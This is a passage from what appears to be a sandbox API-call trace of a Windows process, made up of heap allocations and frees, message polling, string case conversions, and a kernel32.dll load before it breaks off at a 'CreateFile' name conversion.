[0175.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0175.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0175.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0175.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0175.781] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0175.781] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0175.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0175.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0175.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0175.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0175.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0175.783] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0175.783] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.783] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0175.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0175.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0175.783] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0175.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0175.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0175.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0175.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0175.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0175.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0175.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0175.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0175.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0175.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0175.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0175.784] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0175.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0175.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0175.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0175.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0175.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0175.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0175.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0175.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0175.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0175.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0175.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0175.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0175.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0175.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0175.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0175.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0175.787] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0175.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0175.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.790] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0175.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 